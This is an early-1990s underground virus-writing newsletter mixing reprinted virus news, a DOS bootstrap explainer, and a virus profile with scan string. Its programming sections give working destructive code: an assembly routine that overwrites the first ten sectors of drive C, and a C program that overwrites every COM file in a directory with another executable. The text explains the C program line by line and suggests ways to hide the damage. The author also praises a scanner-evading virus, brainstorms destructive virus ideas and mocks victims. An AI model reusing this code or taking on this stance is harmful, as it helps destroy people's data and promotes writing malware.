Viriisearch, The Virus Research Newsletter. In +this issue you will find some changes, the layout has been changed slightly, +there are some new sections, and it's more organized. Let me know how you +like the changes, thanks! 
+ +In this issue: + +----------------------------------------------------------------------------- +DEPARTMENTS: | FEATURES: +----------------------------------------------------------------------------- +In The News | Soviet Virii Attacks + | NASA's "No Nukes Worm" + | The Senate's Virus Bill +----------------------------------------------------------------------------- +Programming Shop | Absolute Disk Reads/Writes +----------------------------------------------------------------------------- +Programming Shop - Dissection Dept. | Explanation Of Above Example +----------------------------------------------------------------------------- +The Machine Shop | The Bootstrap Routine +----------------------------------------------------------------------------- +Sample Source Code Of Virii | A Replication Experiment +----------------------------------------------------------------------------- +"Suicidal Tendencies" Dept. | Leprosy (Strain C) +----------------------------------------------------------------------------- +Virus Info | The Devil's Dance Virus +----------------------------------------------------------------------------- +Articles | Unique Virii Names/Ideas + |------------------------------------ + | Assembly vs C Language Virii + |------------------------------------ + | My Profile Of A Virus Writer And + | My Views On The Virii Law + |------------------------------------ + | Are Virii REALLY A Problem? And For + | Who? + |------------------------------------ + | The Brain Virus: Fact And Fantasy +----------------------------------------------------------------------------- +Final Notes | Special Thanks, Greetings, Etc. +----------------------------------------------------------------------------- + + +In The News: +------------ + +----------------------------------------------------------------------------- +Welcome to a new section of Viriisearch! In this section we will cover virii +that made the news, old and new. Hope you enjoy the new section! 
+----------------------------------------------------------------------------- + +The U.S.S.R. is already suffering from an outburst of computer viruses and +crimes. Computer users should look to U.S. experiences to learn about +information security before the problem escalates even further. Pirated +software is prevalent in the Soviet Union, purchased from Hong Kong and +Swiss connections. The existence of numerous viruses has been confirmed +by Soviet and Eastern Europe anti-viral programmers and include Yankee +Doodle, Disk Killer 170X, Jerusalem, Friday The 13th COM and Victor, to +name a few. Three available antivirus programs are Lozynkv's Aidstest and +Kotik's Anti-Kot and Anti-Kor. Western and home-grown antivirus programs +are also being used. A lack of trained data security experts and data +security support services only make the problem worse. The situation is +likely to worsen before serious measures are taken to combat both viruses +and crime. Decisions about protecting information are not being developed +either. + +"Bozhe Mov! Hackers and viruses already plague Soviets." +Originally written by Sanford Sherizen. +Computerworld August 20th 1990, Page 74. +----------------------------------------------------------------------------- +This next "In The News" Article is about a worm, not a virus, but I found it +interesting and decided to re-print it. +----------------------------------------------------------------------------- + +DEC users are warned by the U.S. Department of Defense's Computer Emergency +Response Team (C.E.R.T) that a worm discovered on a NASA computer network in +the third week of Oct. 1989 may find it's way onto other DECnet networks. The +worm changed system banners to display an antinuclear message, and thus was +called the 'No Nukes Worm' by one NASA official. 
The program entered NASA's +Space Physics Analysis Network (S.P.A.N) through the DECnet Internet series +of networks that links approximately 13,000 computers, government agencies, +research centers, universities, and other facilities. DEC spokesman Jef +Gibson said that VAX/VMS system managers should have closed the loophole +through which the worm gained access after it was discovered in Dec. 1988. +NASA believes the worm may have been intended to protest the launch of the +Atlantis space shuttle that carried a plutonium powered probe on it's way to +Jupiter. + +"Worms eats holes in NASA's DECnet; 'No Nukes Worm' replaces system banners +with antinuclear message" +Originally written by Michael Alexander and Maryfran Johnson. +Computerworld October 23rd 1989. Page 4. +----------------------------------------------------------------------------- + +A Senate bill updating the Computer Fraud and Abuse Act of 1986 is being +praised by computer and legal experts, but it's passage could encourage +lawsuits against innocent institutions. The bill redefines the notion of +computer 'access' to cover the intentional transmission or distribution of +unauthorized applications that somehow cause damage to either hardware, +software, or data. Intentional abusers face felony charges with penalties +up to five years in prison and a $250,000 fine. The reckless, albeit, +unintentional transmission of virus-ridden software could result in a +misdemeanor charge and up to one year in jail and a $5,000 fine. The reach +of the previous law would also be extended to include computers used in +interstate communications or commerce. A U.S. Department of Justice official +says the bill grants prosecutors greater flexibility. + +"Virus bill raises hopes, fears: updated laws could hold unwitting transmi- +tters liable for damages. (Computer Fraud and Abuse Act of 1986)" +Originally written by Gary H. Anthes. +Computerworld August 13th, 1990. Page 45. 
+----------------------------------------------------------------------------- + +Programming Shop: +----------------- + +***************************************************************************** +First we will cover absolute disk reads/writes using Assembly language. +***************************************************************************** + +This next example will write the contents of 'buffer' to the first ten +sectors of drive C: + +***************************************************************************** +WARNING: There is NO recovery from this. +***************************************************************************** + +abswrite proc near +buffer db 'Lick Me' dup (?) + mov al,2 + mov cx,10 + mov dx,1 + mov bx,seg buffer + mov ds,bx + mov bx,offset buffer + int 26h + jc error + add sp,2 +abswrite endp + +***************************************************************************** +Next is absolute disk read(s) +***************************************************************************** + +absread proc near +buffer db 512 dup (?) + mov al,2 + mov cx,10 + mov dx,1 + mov bx,seg buffer + mov ds,bx + mov bx,offset buffer + int 25h + jc error + add sp,2 +absread endp + +***************************************************************************** +Programming Shop - Dissection Dept. +***************************************************************************** + +absread proc near +buffer db 512 dup (?) + mov al,2 + mov cx,10 + mov dx,1 + mov bx,seg buffer + mov ds,bx + mov bx,offset buffer + int 25h + jc error + add sp,2 +absread endp + +***************************************************************************** + +First we will discuss absolute disk read(s). + + The line "mov al,2" is telling which drive we want to read from. Drive #2 is + drive C. + + The next line, "mov cx,10" is telling how many sectors we want to read (10) + + The line, "mov dx,1" is telling the starting sector number to start reading + at. 
(1) + + The next three lines: + + mov bx,seg buffer + mov ds,bx + mov bx,offset buffer + + establish the address of the buffer, and then DS:BX point to the + segment:offset of the buffer. + + The next line, "int 25h" is the function number of the "absolute read" + function. + + The next line, "jc error" jumps if there is an error. + + and the last line, "add sp,2" clears the stack. + +Notes: The purpose of clearing the stack using "add sp,2" is because, when +function int 26h returns, the CPU flags originally pushed onto the stack by +int 26h are still on it. You should clear it to prevent uncontrolled stack +growth and to make available any other values pushed onto the stack before +the call to int 26h. + +***************************************************************************** +Next we will discuss absolute disk write(s) and the difference between the +two functions, read and write. +***************************************************************************** +As you can see, there is little difference between the two: + + Absolute Read: Absolute Write: +_____________________________________________________________________________ +absread proc near | abswrite proc near +buffer db 512 dup (?) | buffer db 'Lick Me' dup (?) + mov al,2 | mov al,2 + mov cx,10 | mov cx,10 + mov dx,1 | mov dx,1 + mov bx,seg buffer | mov bx,seg buffer + mov ds,bx | mov ds,bx + mov bx,offset buffer | mov bx,offset buffer + int 25h | int 26h + jc error | jc error + add sp,2 | add sp,2 +absread endp | abswrite endp +----------------------------------------------------------------------------- +Absolute disk read and absolute disk write are identical except for four +lines: + +Note: Periods replace the lines in each example that are identical. +----------------------------------------------------------------------------- +absread proc near | abswrite proc near +buffer db 512 dup (?) | buffer db 'Lick Me' dup (?) + . | . + . | . + . | . + . | . + . | . + . | . + int 25h | int 26h | + . 
| . + . | . +absread endp | abswrite endp +----------------------------------------------------------------------------- +The differences in the above examples are as follows: + +The first line: This is the beginning of each procedure. They are named for +what they do, absread for absolute read and abswrite for absolute write. You +could've named the two procedures something else, for instance: shithead and +dickhead, and it wouldn't matter. + +The second line: In the case of absolute read, we have our buffer declared as +512 bytes and not initialized. In the case of absolute write, we have the +buffer initialized to store the string 'Lick Me'. + +The ninth line: This line is the function number, int 25h being the function +number for absolute disk read, and int 26h being the function number for +absolute disk write. + +The twelfth line: This is just the end of each of the two procedures. +***************************************************************************** + +The Machine Shop: +----------------- + +----------------------------------------------------------------------------- +Welcome to a brand new section of Viriisearch! Here we will discuss hardware +oriented subjects, such as RAM, Machine Cycles, Boot Routines, etc. +----------------------------------------------------------------------------- +This month we will discuss the 'Bootstrap' routine. +----------------------------------------------------------------------------- +Many people turn on their machines, let DOS load and don't think a second +thought about it. Those people also take MS-DOS for granted and don't even +care what it it doing, even though it is the most important piece of software +a IBM user can have. 
One of my favorite sayings: 'A Computer Without MS-DOS +Is Little More Than A Boat Anchor' + +Here I will tell exactly what MS-DOS does from the second you hit the power +switch up until the time you get the prompt --> C> + +When the system is started or reset, program execution begins at address +0FFFF0H. This is a feature of the 8086/8088 family of microprocessors and +has nothing to do with MS-DOS. Systems based on these processors are design- +ed so that address 0FFFF0H lies with an area of ROM and contains a jump mach- +ine instruction to transfer control to system test code and the ROM bootstrap +routine. + +The ROM bootstrap routines reads the disk bootstrap routine from the first +sector of the system startup disk (the boot sector) into memory at some +arbitrary address and then transfers control to it. (The boot sector also +contains a table of information about the disk format.) + +The disk bootstrap routine checks to see if the disk contains a copy of +MS-DOS. It does this by reading the first sector of the root directory +and determining whether the first two files are IO.SYS and MSDOS.SYS (or +IBMIO.COM and IBMDOS.COM), in that order. If these files are not present, +the user is prompted to change disks and strike any key to try again. If +the two system files are found, the disk bootstrap routine reads them into +memory and transfers control to the initial entry point of IO.SYS. (In some +implementations, the disk bootstrap routine reads only IO.SYS into memory, +and IO.SYS in turn loads the MSDOS.SYS file.) + +The IO.SYS file that is loaded from the disk actually consists of two separ- +ate modules. The first is the BIOS, which contains the linked set of resident +device drivers for the console, auxiliary port, printer, block, and clock de- +vices, plus some hardware specific initialization code that is run only at +system startup. 
The second module, SYSINIT, is supplied by Microsoft and lin- +ked into the IO.SYS file, along with the BIOS, by the computer manufacturer. + +SYSINIT is called by the manufacturer's BIOS initialization code. It determ- +ines the amount of contiguous memory present in the system and then relocates +itself to high memory. Then it moves the DOS kernel, MSDOS.SYS, from it's or- +iginal load location to it's final memory location, overlaying the original +SYSINIT code and any other expendable initialization code that was contained +in the IO.SYS file. + +Next, SYSINIT calls the initialization code in MSDOS.SYS. The DOS kernel in- +itializes its internal tables and work areas, sets up the interrupt vectors +20H through 2FH, and traces through the linked list of resident device driv- +ers, calling the initialization function for each. These driver functions +determine the equipment status, perform any necessary hardware initialization, +and set up the vectors for any external hardware interrupts the drivers will +service. + +As part of the initialization sequence, the DOS kernel examines the disk par- +ameter blocks returned by the resident block-device drivers, determines the +largest sector size that will be used in the system, builds some drive par- +ameter blocks, and allocates a disk sector buffer. Control then returns to +SYSINIT. + +When the DOS kernel has been initialized and all the resident device drivers +are available, SYSINIT can call on the normal MS-DOS file services to open +the CONFIG.SYS file. This optional file can contain a variety of commands +that enable the user to customize the MS-DOS environment. For instance, the +user can specify additional hardware device drivers, the number of disk buf- +fers, the maximum number of files that can be open at one time, and the file +name of the command processor (shell). + +if it is found, the entire CONFIG.SYS file is loaded into memory for process- +ing. 
All lowercase characters are converted to uppercase, and the file is in- +terpreted one line at a time to process the commands. Memory is allocated for +the disk buffer cache and the internal file control blocks used by the handle +file and record system functions. Any device drivers indicated in the CONFIG +file are sequentially loaded into memory, initialized by calls to their init +modules, and linked into the device driver list. The init function of each +driver tells SYSINIT how much memory to reserve for that driver. After all +installable device drivers have been loaded, SYSINIT closes all file handles +and reopens the console (CON), printer (PRN), and auxiliary (AUX) devices as +the standard input, standard output, standard error, standard list, and sta- +ndard auxiliary devices. This allows a user-installed character device driver +to override the BIOS's resident drivers for the standard devices. + +Finally, SYSINIT calls the MS-DOS EXEC function to load the command interpr- +eter, or shell. (The default shell is COMMAND.COM, but another shell can be +substituted by means of the CONFIG.SYS file.) Once the shell is loaded, it +looks for AUTOEXEC.BAT, automatically running any internal DOS commands and +external commands inside that file. If it doesn't find AUTOEXEC.BAT it will +ask for the date and time (providing a clock chip isn't present) and then +displays the prompt, waiting for the user to enter a command. MS-DOS is now +ready for business, and SYSINIT is discarded. + +----------------------------------------------------------------------------- + +Sample Source Code Of Virii: +---------------------------- + +----------------------------------------------------------------------------- +This month we will discuss something I have been fooling around with and have +finally completed. It is not a virus, but can be modified and made into one. 
+What the following code basically does is find all the COM files in the curr- +ent directory, and overwrites them with itself. It's basically a replicating +program. +----------------------------------------------------------------------------- + +#include +#include +#include +#include +#include +#include +#include +#include +FILE *file1,*file2; +int main(void); +main() +{ + long size; + char *code = NULL; + struct find_t com_file; + _dos_findfirst("*.COM", _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &com_file); + chmod(com_file.name, S_IREAD|S_IWRITE); + file1=fopen("HELLO.EXE","rb"); + file2=fopen(com_file.name,"wb"); + size=filelength(fileno(file1)); + code=malloc(size); + fread(code, size, 1, file1); + fwrite(code, size, 1, file2); + while (_dos_findnext(&com_file) == 0) + { + chmod(com_file.name, S_IREAD|S_IWRITE); + file2=fopen(com_file.name,"wb"); + fwrite(code, size, 1, file2); + } + fcloseall(); + free(code); +} + +----------------------------------------------------------------------------- +Ok, this line: + +_dos_findfirst("*.COM", _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &com_file); + +finds the first occurence of a COM file with any of the attributes listed. +They are "ORed" together using the | character. It passes the filename to +the "com_file" structure, and references to that file are now: com_file.name + +Upon one being found, it goes onto: + +chmod(com_file.name, S_IREAD|S_IWRITE); + +which changes the attributes of the file found to that it can be written to. + +The next line opens the file you want to replicate in "read binary" mode, that +it what the "rb" switch is for. + +file1=fopen("VIRUS.EXE","rb"); + +Then it opens the first COM file, the 'victim' to be overwritten, in "write +binary" mode (that's what the "wb" is for) + +file2=fopen(com_file.name,"wb"); + +Then it obtains the size of the virus and allocates enough memory for it. 
+ + size=filelength(fileno(file1)); + code=malloc(size); + +Then it reads the virus code into the buffer "code" which is size "size", is +1 item, and is reading it from "file1" + + fread(code, size, 1, file1); + +Then it takes "code" which is size "size", is 1 item, and writes it to "file2" + +fwrite(code, size, 1, file2); + +Once it is done with that, it goes onto the loop: + +while (_dos_findnext(&com_file) == 0) + { + chmod(com_file.name, S_IREAD|S_IWRITE); + file2=fopen(com_file.name,"wb"); + fwrite(code, size, 1, file2); + } + +Both _dos_findfirst() and _dos_findnext return 0 if they are successful at +finding the specified file, so basicall this loop is saying: + +"keep going as long as _dos_findnext(&com_file)) equals 0" + +What it does every time it passes through the loop (i.e. - finds a COM file): + +changes the mode of the file so it can be written to, opens that file in +"write binary" mode, and writes the virus code to it. + +When there are no more COM files found, the loop is done and it goes onto the +next part of the program: + +fcloseall(); +free(code); +} + +it closes all open files associated with this program, releases the previous- +ly allocated memory for the virus code, and exits. +----------------------------------------------------------------------------- +NOTES: + +This is kind of slow but is somewhat faster than the example in issue #2 that +truncated files to 0 bytes. You can also fool around with getting and setting the file's +date and time, and changing it's size back to what it was originally to cover +your tracks. 
+ +----------------------------------------------------------------------------- +Suicidal Tendencies Dept/Virus Of The Month: +----------------------------------------------------------------------------- +The virus of the award month goes to: Leprosy (C Strain) +----------------------------------------------------------------------------- +NOTE: This is actually Leprosy - B Strain , but modified by TBSI so McAffee's +scanner wouldn't find it. Originally written by PCM2 in August of 1990. +Modified by TBSI in June of 1991. + +PCM2, The person who wrote this, and all other strains of Leprosy, did a real +nice job with this one. I placed the file, LEPROSYC.COM, on a 5.25 360K +floppy in drive B and this is what was on the disk: + + Volume in drive B has no label + Directory of B:\ + + COMMAND COM 47845 04-09-91 5:00a + ANSI SYS 9029 04-09-91 5:00a + RAMDRIVE SYS 5873 04-09-91 5:00a + CONFIG SYS 39 01-01-80 12:35a + SYS COM 13440 04-09-91 5:00a + NDOS COM 2419 08-14-84 12:00p + MEM EXE 39818 04-09-91 5:00a + DEBUG EXE 21692 06-07-90 2:24a + AUTOEXEC BAT 69 01-01-80 3:37a + PKUNZIP EXE 23528 03-15-90 1:10a + LEPROSYC COM 666 06-05-91 12:36a + 11 file(s) 164418 bytes + 192512 bytes free + +This is BEFORE I ran the virus...this is after: + + Volume in drive B has no label + Directory of B:\ + + COMMAND COM 47845 04-09-91 5:00a + ANSI SYS 9029 04-09-91 5:00a + RAMDRIVE SYS 5873 04-09-91 5:00a + CONFIG SYS 39 01-01-80 12:35a + SYS COM 13440 04-09-91 5:00a + NDOS COM 2419 08-14-84 12:00p + MEM EXE 39818 04-09-91 5:00a + DEBUG EXE 21692 06-07-90 2:24a + AUTOEXEC BAT 69 01-01-80 3:37a + PKUNZIP EXE 23528 03-15-90 1:10a + LEPROSYC COM 666 06-05-91 12:36a + 11 file(s) 164418 bytes + 192512 bytes free + +There is not one single difference with any of the files, yet EVERY .EXE and +.COM file on the disk was infected. No changes in size, no date/time changes. 
+Well, the dates and times did change but the virus preserves the original date +and time stamps, restoring them once the infection is complete. But no changes +in file sizes.....this virus was very well written. It was fast, efficient, +and very small in size. The source code to this particular virus is 16664 +bytes, and, as you can see, the .COM file is only 666 bytes. This is what the +virus did when run: It accessed drive B for a few seconds, and gave me the +error message: Program too big to fit into memory. I did not notice any +changes at all so I assumed it didn't infect any of the files, but when I ran +each .EXE and .COM file on the disk, they all gave me that error message... +'Program too big to fit into memory' so I assume they all were infected. +The program is actually supposed to give me this message when it is done: + + + ATTENTION! Your computer has been afflicted with + the incurable decay that is the fate wrought by + Leprosy Strain B, a virus employing Cybernetic + Mutation Technology(tm) and invented by PCM2 08/90. + +For some reason it did not display this message. Perhaps there is a certain +amount of files it must infect before it displays it. I did not take too +good of a look at the source to determine this. All in all a very nicely +written virus, does it's job fast and very efficiently. +----------------------------------------------------------------------------- + + +Virus Info: +----------- + +----------------------------------------------------------------------------- +Welcome to a brand new section of Viriisearch! In this section we will give +valuable information on a virus, such as origin, aliases, etc. Some of the +info presented here is taken from the file: MSDOS.ZIP, a index of DOS virii. +Other info presented was supplied by me, such as the scan string, name of +virus author, etc. 
+----------------------------------------------------------------------------- +Virus Spotlight This Month Will Cover: The Devil's Dance Virus +***************************************************************************** +Name Of Virus: The Devil's Dance Virus + +Virus Aliases: Devil/941 Virus + +Name Of Virus Author: N/A + +Language Virus Was Written In: N/A + +Date Virus Was First Discovered Or Originated: Spring of 1990 + +Place Virus Was First Discovered Or Originated: Mexico City + +Scan String: +0L0G0M0H0G1U0G0R0HBK2MDY3Y0G0G4MCU0G2LDG1Y4LCU0G2L0G2MBR4SDNFLDN8H3XFW4XBW5U0 +G2L1WDNFGFM0H0JBR0G0Q6MAV0G0M6GFK0G0MBV7W0G0M6GFK0G0M7Z0G0M9SEJBZ1L0G0M5S0G2L +1L0G0M1L0G0MEW0G0MBR0M0MAW4Q0K0G0G + +Checksum: CF3C + +Hooked Interrupts: INT 21H, functions 4B00H and 49H, INT 09H + + +Trigger: Upon INT 21H, function 4B00H, being called, the .COM file will be + infected. Also, if you hit the CTRL-ALT-DEL sequence anytime after + typing a total of 2,500 characters, the first sector of drive C will + be overwritten. + +Identification: If you do a hexadecimal dump of the virus, the following: + + "Drk" & "*.com" + + should be seen in the code. + + Also, the time and date of the infected file is set to the + time and date of infection. + + If you rest the system by pressing CTRL-ALT-DEL, the virus + will display the following message: + + + "Have you ever danced with" + "the devil under the weak light of the moon?" + "Pray for your disk! The_Joker..." + "Ha Ha Ha Ha Ha Ha Ha Ha Ha Ha". + + If your monitor/card supports color, all characters typed + will be in a different color. + + +Size & Name Of Original Virus EXE/COM File: N/A + +Techniques Used: All file attributes are removed and the following message is + encrypted: + + "Have you ever danced with" + "the devil under the weak light of the moon?" + "Pray for your disk! The_Joker..." + "Ha Ha Ha Ha Ha Ha Ha Ha Ha Ha". 
+ + +What It Attacks: + +.COM Files: Yes + +.EXE Files: No + +COMMAND.COM: Yes (If in the current directory when virus is first run, or if + COMMAND.COM is run) + +Boot Sector: No + +File Allocation Table (FAT): No + +Fixed Disk Partition Table: No + +Note: The Boot Sector, FAT, or Fixed Disk Partition Table MAY be attacked if + any of them reside on the first sector of drive C because the virus + does attack that part of the drive. (See Damage Report) + +It depends on your drive and what resides in the first sector. + +Change In Size/Date/Time Of Infected File: 941 bytes, Date & Time Is Changed + According To The System's Date And + Time At The Time Of Infection. + +Virus Volume Label: None + +Known Number Of Strain(s): None + +Damage : When the virus is first run, it will infect ALL the .COM + files in the current directory. After pressing 2,500 keys, + if you should reset the system by pressing CTRL-ALT-DEL, the + virus will overwrite the first sector of drive C. Also, any + .COM file you run will be infected. If the .COM file infected + is bigger than 64,337 bytes, it will not run correctly after + being infected. + +***************************************************************************** +--------- +Articles: +--------- + + **************************** + * Unique Virii Names/Ideas * + **************************** + + +I was looking at some virii names recently, and I noticed that a few of them +are pretty stupid...like 'Fuck you' or 'Fuck Me' or 'Phuck'....it does not +take too much intelligence to think up these names so that's why I decided +to include this article in this month's Viriisearch and here are some +virii names and ideas that I thought of: +----------------------------------------------------------------------------- +Stolichnaya - Maybe we could have this one display a picture of Kitty Dukakis + as it deletes your files or trashes your hard drive. + +Valhalla - For those of you who don't know, Valhalla is the Viking Heaven. 
+ To be honest, I didn't really put much thought into what this + would do as a virus.....I just like the name and though it + might be a cool name for a virus. + +Red Sector A - This is a song by Canadian Power Trio, Rush. Perhaps this can + overwrite the boot sector with the lyrics to the song. Maybe + have it pick randomly from a list of tour dates from the 'Roll + the bones' tour as it's trigger date. + +4th Of July - We have virii for Christmas, Columbus Day, etc....but I have + not seen one called 4th Of July....so here we are... + +Blizzard - We could have this annoy the user with random 'snow' on the + monitor which gradually gets worse and worse until you can no + longer see the screen. While it is doing that and flashing + fake error messages, it can eat some files or encrypt the file + allocation table or something. We can also have it's trigger + date as the date that the Blizzard of '78 hit... + +***************************************************************************** + + ******************************** + * Assembly vs C Language Virii * + ******************************** + + +Most C language functions are written in Assembly, so some consider C a +modified Assembly language....and some also claim that a well written C +program is almost as fast as Assembly. This may be true, but when it comes +to writing a virus, I say Assembly is the winner hands down. Earlier we had +discussed the "Leprosy-B" virus. The Assembly source code to that virus is +16664 bytes and the .COM is a remarkable 666 bytes. If I tried to write that +virus in C language, the smallest I could get the .COM or .EXE file would be +about 8 kilobytes if I was lucky. In a previous issue, we discussed my ATTRB +program which is about 3K in source, and a 9K executable, and that is really +good for C language...here we have a .COM file smaller than the source code. +Well over 20% smaller. 
+ +***************************************************************************** + + ********************************* + * My Profile Of A Virus Writer * + * And My Views On The Virus Law * + ********************************* + + +A lot of people may wonder why someone would want to write a virus. Some +people believe it's a former employee wanting revenge against his company. +Others believe that it's a personal vendetta against a fellow computer user +or the sysop of a BBS, or a student wishing to piss his teacher off. Some or +all of these may be true, but I personally believe that one person cannot +possibly mad at all of the computer society. So, why would someone want to +write a virus? Well, Phalcon/Skism (Canada) claim they do it to 'make the +lives of the anti-viral people a living hell' so there's one reason. I also +believe they do it because THEY CAN. That's it. They do it because they know +how. I don't see the average virus writer as a basket case genius egomaniac +as a lot of people do, I see them as a ordinary every day person with very +good programming abilities and nothing more. I do not sympathize with any +person that gets hit by a virus, either. I sit there and laugh alongside the +person who wrote the virus. Sound cruel? Well, I have my reasons. People know +they exist, and all the information they need to protect themselves and +prevent virus attacks is all right there for the taking. Not just in the +underground so there is no excuse why these people cannot obtain these +materials....If you take the proper precautions and steps, a virus attack +will never happen on your machine and if a real intelligent one comes along +that is able to sneak by a virus scanner and/or disable a virus scanner's +method(s) of scanning, and your hard drive is wiped clean, that's what back +ups are for. 
If you are one of those people who don't want to take the time +to backup, or think backing up is 'for wimps' (as someone had said once - I +am not sure if they were serious or not) when you lose everything just bend +over and kiss your sorry ass goodbye. Anyway, back to the topic of this art- +icle: Why would someone want to write a virus? I already covered some of the +reason why one would want to do this, and covered my reason why they do it. +The average virus writer writes his virus in the hopes some sap doesn't listen +to all the warnings and runs software downloaded from a BBS without scanning +it for a known virus first and gets hit by it. Then he sits there and laughs +his ass off. And I don't blame him. And as for all this law bullshit about +computer virii (The Computer Fraud And Abuse Act Of 1986) I have to laugh +about that, too....I don't really see computer virii as a major threat to +much of anything. It all depends on how you look at it I suppose. I see it +this way: A favorite book of yours gets stolen or destroyed. You have another +copy of it. Do you care about the stolen/destroyed one? Yes, slightly, but +not as much if the stolen/destroyed one had been your only copy. Same with +software. That's why I think the law(s) concerning virii is ridiculous. Now +only if they put that much effort into more serious crimes, like murder, rape +and drugs. In the article earlier, they mentioned a sentence of five years +in jail and a $250,000 fine...for what? Contaminating some bureacrats PC and +destroying his list of drugs growing in his backyard? And look at Robert T. +Morris Jr. He found a loophole in ARPANET, wrote and released a worm that +hogged all the memory and forced thousands of machines to be shut down for +up to ten days or so. So what? Did he deserve what they gave him? He was +thrown out of school, forced to pay $10,000 in fines, perform 400 hours of +community services, and was on 3 years probation. 
I do not agree with this +at all whatsoever. The reason why he got such a stiff sentence for such a +minor crime, if you can call it a crime at all, is because the government +had a interest in the network Morris interrupted. Morris didn't even have +malicious intent. They should be glad that HE, and not someone else who might +have had malicious destruction in mind, showed them the security loopholes in +the system. Instead they fine him, make him do community services (which was +probably cleaning some rich bureacrats pool or trimming his lawn) and place +him on 3 years probation hoping he fucked up again so they could make more +money and wouldn't have to worry about their lawns or pools for another few +weeks. + +***************************************************************************** + + ******************************* + * Are Virii Really A Problem? * + * And For Who? * + ******************************* + +This is a question I present to the bureacrats and lawmakers: Are virii a +REAL problem? And for who are they a problem? I think they are blowing the +whole thing way out of proportion and making people into criminals who are +not criminals. Let's say you rip out asbestos for a living, and you get +sick from it. Would you call the person that makes the asbestos a criminal? +No, of course not. Asbestos is just a hazard of the job. If your job deals +with computers, consider computer virii as just a hazard of the job. It's a +chance you take. If you don't want to take the risk, either find another +career or take the proper precautions to prevent a virus attack. Just like +the person who works with asbestos every day, he wears a mask, and gloves so +he doesn't get sick. So equip yourself with a real good scanner, be real +careful about where and who you get your software from and stop calling the +people who write virii 'criminals' and treating them like they are. 
Or if you +are too damn lazy to take the proper precautions, just have a backup at all +times. Should you get attacked by a virus, clean up the computer and install +everything again. I am, of course, referring to personal PCs...and not main- +frames, or networks....this is what I have to say about them: If Internet or +NASA's network should get attacked and disabled again, I say the institutions +and people who pay to use those networks should sue NASA or the people who +run Internet because they are the real criminals for not taking steps to make +sure this didn't happen again. It's kind of like this: If you left your front +door open with a $800 VCR and a $500 TV clearly in view, do you think it would +still be there when you got home? No, of course not, so you lock your door and +equip your home with a expensive alarm system. Why these people who scream +computer crime every time their system gets attacked don't have more secure +systems is beyond me. Instead of crying for anti-virus laws they should spend +more time making the security on their network or mainframe even tighter. The +answer to the question 'Are virii a REAL problem?' is NO....at least to me. +People make into a problem. 'A problem for who?' Lazy virus illiterate people +who don't know any better....that don't bother securing their systems. To me +that's their own damn fault and THEY should be brought up on charges. Maybe +we should have a new law...'The virus ignorance law' + +Section 51-A Of The 1986 Computer Fraud And Abuse Act Of 1986 Clearly States +That You, If Found Guilty Of Virus Ignorance, Could Be Sentenced To Up To 5 +Years In Jail, $500,000 In Fines, 800 Hours Of Cleaning Virus Ridden Computers +And 2 Years Probation. + +After all, wouldn't you consider sitting there with your head firmly wedged +up your ass as your computer gets invaded by a virus, computer abuse? + +I do. 
+ +***************************************************************************** + +This one is for Midnight Cowboy. + +This was taken from a book and re-printed WITHOUT permission from the author. + +***************************************************************************** + + ******************************* + * The Brain Virus: Fact And * + * Fantasy * + ******************************* + +The Brain virus has the distinction of being the first computer virus +to strike in the United States outside of a test laboratory. According +to Ms. Ann Webster of the Academic Computer Center of the University of +Delaware in Newark, Delaware, it was reported to the Computer Center on +October 22, 1987. It was found in other locations on the campus one or +two days later. It was named the Brain virus because it wrote that word +as the disk label on any floppy disk it attacked. After the initial an- +alysis of this computer virus on an infected disk two names, Basit and +Amjad, and their address in Lehore, Pakistan, was found. Because of this, +the virus has also been called the Pakistani virus. Many misconceptions +exist about this virus because of incomplete and/or inaccurate statements +that appeared in newspapers. Most of the newspaper and popular magazine +writers did not have any computer knowledge and some were eager to seek +"horror stories: so that their articles would be different. Even the co- +mputer trade and professional publications have included errors in their +accounts of this virus. Some of the professional writers, both in the US +and abroad, based their articles on previously published information. Most +did not have a working copy of the Brain and even the few who did, failed +to fully analyze the actual programs code. In our Microcomputer Security +Laboratory we have several copies of the Brain virus obtained from diff- +erent sources. 
We have spent many hours running the Brain virus, explor- +ing it's different methods of infection, testing it's interaction with +different media and isolating the virus so that we could produce an as- +sembly language listing. We have also discussed its code and infection +methodology with virus researchers. Therefore we hope to clear up some +current confusion. + +Some Characteristics of the Brain +---------------------------------- + +1. The brain has been called benign in the press. Yet, Ms. Webster reported + that the files on a number of infected disks were destroyed. The virus + at times was destructive. It is impossible to be both. This oxymoron can + be explained by the fact that the virus may remain on the floppy disk + without doing any damage. But at times it has been activated so that it + destroys the file allocation table (FAT) that provides information to the + operating system as to the location of all files on the disk. It would be + stretching the dictionary meaning of benign to say that because the cont- + ents of the disk can be reconstructed, no damage has been done. To under- + stand the reconstruction problem, suppose we have a set of 30 company re- + ports, approximately 20 pages each, all typed within the same margins on + the same paper, not page numbered, not clipped, and with no other copy + available. Left near an open window, these 600 pages are blown over a + wide area with no order preserved. Now, put them back in order. Because + the actual data on the floppy disk have not been destroyed, it is poss- + ible to use a utility, such as PC Tools, or the Norton Utilities, to read + each sector. The appropriate sectors can be moved to another disk in an + approximate sequence to replicate the original documents. This is a del- + icate and tiresome task. + +2. The Brain virus does not notify the user that the disk has been infected + immediately before it ruins a disk. The user is never made aware that the + disk has been infected. 
The virus can remain on an infected disk without + damaging it, but there is always a risk of unannounced disaster. + +3. There is NO ransom demand made by the Brain (See Note 1). + +4. The Brain virus code is written so that it will never infect a hard disk. + It is media specific; it will attack only double-sided, nine sectored + floppy disks that have been formatted under some version of DOS. + +5. The virus can infect a microcomputer and spread to floppy disks even if + the boot disk is NOT infected. If a non-bootable infected disk is used + in an attempt to boot a system, the following message will be displayed + on the screen: + + Please Insert A Bootable Disk + The Type [Return] + + By that time the virus has already hidden itself in RAM memory. Using a + clean bootable disk to start the system will result in that disk becom- + ing infected. (See Note 2). The virus will then spread to any other fl- + oppy used on the system. + +6. The virus appears to be unstable. The actual code is some 4100 bytes but + less than half of it is actually executed. Two portions of the program + are neither called nor can many researchers determine under what circum- + stances they would be executed. Was the extra code inserted to confuse + any one who disassembled the program? Is there some what that either or + both uncalled parts are involved that has thus far been undiscovered? + +7. The virus source code contains a counter. The counter is reset often and + it is difficult to determine it's purpose. Because the counter was not + mentioned in published reports about the Brain, "new" viruses appeared. + Some companies whose disks were attacked discovered the counter and de- + cided that they had a new virus. When similarities to the Brain were + found it was decided that the new viruses were hacker versions of the + original found at the University of Delaware. 
